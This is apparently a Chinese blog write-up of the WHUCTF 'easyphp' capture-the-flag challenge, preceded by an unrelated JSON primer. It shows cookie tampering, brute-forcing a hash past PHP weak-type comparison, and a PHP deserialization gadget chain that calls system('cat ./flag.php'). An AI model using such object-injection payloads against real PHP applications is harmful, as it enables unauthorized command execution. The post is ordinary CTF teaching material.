WHUCTF easyphp代码审计

最新推荐文章于 2023-07-01 21:30:47 发布
最新推荐文章于 2023-07-01 21:30:47 发布
阅读量1.7k 收藏 4
点赞数 1
分类专栏: ctf学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44255856/article/details/91358667
版权

JSON 数据结构介绍:
按照最简单的形式,可以用下面这样的 JSON 表示 “名称 / 值对” :{ "firstName": "Brett" } 等效的纯文本为firstName=Brett
但是,当将多个"名称 / 值对"串在一起时,JSON 就会体现出它的价值了。首先,可以创建包含多个"名称 / 值对"的 记录,比如:
{ "firstName": "Brett", "lastName":"McLaughlin", "email": "aaaa" }。从语法方面来看,这与"名称 / 值对"相比并没有很大的优势,但是在这种情况下 JSON 更容易使用,而且可读性更好。例如,它明确地表示以上三个值都是同一记录的一部分;花括号使这些值有了某种联系。

WHUCTF easyphp
在这里插入图片描述

首先这道题要先传入一个COOKIE,且COOKIE值为admin.后再admin中匹配{"hash": [\w\"]+}$
在这里插入图片描述
发现不存在COOKIE值,于是添加Cookie: admin={“hash”: 0}
在这里插入图片描述
发现了给了个提示,且提示的数字是**00111000100001100101001001000101**这个数字也就是ord(MD5($flag)[$i]
发现要判断这个是否相等($session_data['hash'] != strtoupper(MD5($flag))),相等则继续进行。hash和MD5可以使用弱类型绕过。而后半部分的strtoupper(MD5($flag))这个值是固定的所以可以使用bp对hash值爆破。
在这里插入图片描述
当hash值为82时成功绕过。
后半部是一个反序列化的问题。构造ROP(返回导向编程)。即可执行cat ./flag.php成功获取flag
构造如下:

<?php
class WHUCTF {
    protected $stu;

    function __construct() {
        $this->stu = new Evil();
    }
 
    function __destruct() {
        $this->stu->action();
    }
}
 
class Evil {
    function action() {
        system('cat ./flag.php');
    }
}
echo urlencode(serialize(new WHUCTF()));

将生成的值带入get查询,成功得到flag

参考链接:https://www.cnblogs.com/SkySoot/archive/2012/04/17/2453010.html

「已注销」
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了...
WHUCTF做题记录-第九题dank-php
callmelzl的博客
09-26 379
markdown用的不好,并且有写的不恰当的地方还请大佬指正,这题主要的知识点是php反序列化和无数字字母执行函数获取webshell <?php include "flag.php"; show_source(__FILE__); class user { var $name; var $pass; var $secret; } if (isset($_GET['id'])) { $id = $_GET['id']; $usr = unserialize($id);
【转载】[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
SunnyCat
05-30 498
https://blog.csdn.net/Eastmount/article/details/106409569?utm_medium=distribute.pc_category.none-task-blog-hot-5.nonecase&depth_1-utm_source=distribute.pc_category.none-task-blog-hot-5.nonecase&request_id= 链接.
【攻防世界】江苏工匠杯 Web easyphp
DG_s1mple
12-30 880
打开页面是一个代码审计的题目,是我不太熟悉的东西,但是没关系,我们可以学是吧,以下为源代码。
EasyPHP.zip
07-11
EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件
EasyPHP5-3-14
07-22
资源名称:EasyPHP5-3-14工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
easyphp5.4.6
02-08
一款集成PHP,APACHE,MYSQL的工具,绝对可用并好用!!
EasyPHP5.3.5.0setup
05-22
EasyPHP5.3.5.0setup安装软件包5.3.5.0,方便,可用。
CTF 云演LANCTF_2019_easyphp
qq_42385363的博客
07-01 171
使用true来绕过==,即true弱等于任何非0数值,我们就可以使用来绕过,但是这里不能传字符串,是我们需要将true隔开,字符串不能实现,所以这里需要传入数组来实现,即传入[true,true,true,true,true,true,true] ,所以现在我们知道怎么做了,上手,我们进行修改。这里需要注意,我们后面需要加上php,是因为源码里面进行了拼接 ,前面的$file是我们md5加密后的整个文件名(b.php),后面是$name1,也就是文件类型,即后缀,所以要加上php。
i春秋网络内生安全试验场CTF夺旗赛(第二季)部分Web题WriteUp
李熠专用博客_白帽子一枚,人称低危终结者
10-26 4474
1.easyphp 地址:http://120.55.43.255:13005/ 打开后查看源码,发现show.php。 该地址后有一个base64字符串,解码后内容为:hint.jpg 将首页地址index.php编码后,放到show.php可看到注释掉的php源码。 分析改源码可知,此题为反序列化的题,我们需要构造一个反序列化字符串的payload,通过clas...
CTF之web——cookie
weixin_61167540的博客
11-23 1672
在cmd中输入:curl -i http://challenge-5460ffbe35aa75a0.sandbox.ctfhub.com:10800/ --cookie "admin=1"这里之所以设置cookie为admin=1,是因为上图中看到网页的请求头里admin=0,也就是设置的不是admin用户去访问的,改成1就好啦。cookie是存储再客户端上的一小段数据,浏览器(即客户端)通过HTTP协议和服务器端进行cookie交互,通常用来存储一些不敏感信息。
php 弱相等,关于php弱类型的小总结
weixin_42647395的博客
03-12 539
文章最后更新时间为:2019年07月08日 22:19:46之前的一篇笔记,发到blog上。PHP,俗称世界上最好的语言,也是CTF中WEB方向最常见的语言,其中利用PHP弱类型特性来绕过限制的情况也比较多,这里结合实例总结一下常见的考察点。0x01 强制类型转换先来看题目...
2020_WHUCTF_Writeup(部分)
热门推荐
lysecl‘s blog
05-28 4万+
0x1 crypto bvibvi 首先要通过验证问题,对一个等式计算求解,简单的枚举求解即可。 通过验证过后,需要回答一系列问题,是关于B站BV号和AV号的。 题目给出BV号,让我们找出对应的AV号。多组正确后再给AV号,让我们找出BV号。 简单的了解了下Bilibili的av号和bv号知识后,发现 av号对应url格式为 url =‘https://www.bilibili.com/video/av’+aid bv号为 url =‘https://www.bilibili.com/video/’+b
CTFweb篇-Cookies欺骗
weixin_44597701的博客
08-06 1万+
什么是cookie 其实cookies是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络浏览行为有关,所以存储在你电脑上的cookies就好像你的一张身份证,你电脑上的cookies和其他电脑上的cookies是不一样的;cookies不能被视作代码执行,也不能成为病毒,所以它对你基本无害。 cookie可以在报文头的前面进行设置。 例题: 打开是一连串字母,没有用处 于是从URL入手,http://123.206.87.240:8002/web11/index.php?line=&a
CTFHub技能树之WEB:Cookie注入
weixin_48799157的博客
03-20 1267
小白一个,如有错误请指正! 解法一:使用Burpsuite抓包 1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater 2.在Repeater界面发送数据包,发现可以看到返回的数据 3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段 有回显 有回显 没有回显 4.爆数据库 id=123 union select 1,database()# 5.爆表名 id=123 union select 1...
Web安全攻防世界05 easyphp(江苏工匠杯)
weixin_42789937的博客
12-04 3625
Web安全攻防世界05 easyphp(江苏工匠杯),呃...我php0基础,自己解题,所以写得会很啰嗦...内容对小白依然非常友好~
CTF-江苏工匠杯easyphp 题解
百彦子烨的博客
11-04 3912
攻防世界-web新手区-江苏工匠杯-easyphp 题解
攻防世界 easyphp
最新发布
09-11
EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值